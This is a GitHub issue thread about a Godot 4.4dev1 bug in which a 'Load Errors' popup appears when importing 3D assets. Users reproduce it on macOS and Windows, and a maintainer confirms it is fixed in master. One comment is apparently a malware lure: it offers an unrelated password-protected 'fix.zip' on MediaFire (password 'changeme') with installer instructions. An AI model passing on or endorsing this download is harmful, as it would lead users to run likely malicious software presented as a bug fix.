### ISSUE TITLE
Popup Load Errors dialog on Mac in version 4.4dev1 when importing 3D assets to Godot

### ISSUE THREAD

**Issue by snougo** [godotengine/godot#96259]
### Tested versions

Reproducible in 4.4dev1, there is no such popup error message dialog in 4.3 stable

### System information

MacOS 14.6.1/Godot4.4dev1/Metal(forward+)/M3 Max

### Issue description

when importing a 3d assets into Godot 4.4dev1(glb,gltf,fbx,blend), it will popup a load errors dialog, but the popup dialog will automatically closes after the import process completes.

it's weird that after import process completes,  you can normal instance the 3d assets without problem, the only problem is popup errors dialog will appears everytime again when saving scene

<img width="1016" alt="截屏2024-08-28 19 47 35" src="https://github.com/user-attachments/assets/57a02d94-333a-40ab-b550-794510dd2f73">
<img width="798" alt="截屏2024-08-28 19 47 56" src="https://github.com/user-attachments/assets/35a2c6a8-5f50-4c5e-a7a4-816eaa8b95c5">

### Steps to reproduce

importing a large 3d assets into Godot so you can see the popup error dialog

PS: because the import process is so fast when importing simple 3D assets into Godot, the error dialog often appears too quickly to be seen

try this one: https://sketchfab.com/3d-models/huge-medieval-battle-scene-19b198bb18be49498db3b647abebc755

### Minimal reproduction project (MRP)

[test.zip](https://github.com/user-attachments/files/16791560/test.zip)

**Comment by africanobyamugisha** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by eviltrout** [comment]
I am getting this issue on Windows too whenever I save/import a `.blend` file. My console says this (models is my path):

```
Resource file not found: res://models (expected type: )
```

And the pop up window has the same post-import message.

**Comment by Hilderin** [comment]
I'm able to reproduce the issue with 4.4 dev 1 but I'm not able with a build from master. I guess the error was already fixed?

**Comment by akien-mga** [comment]
Confirmed fixed in `master`.
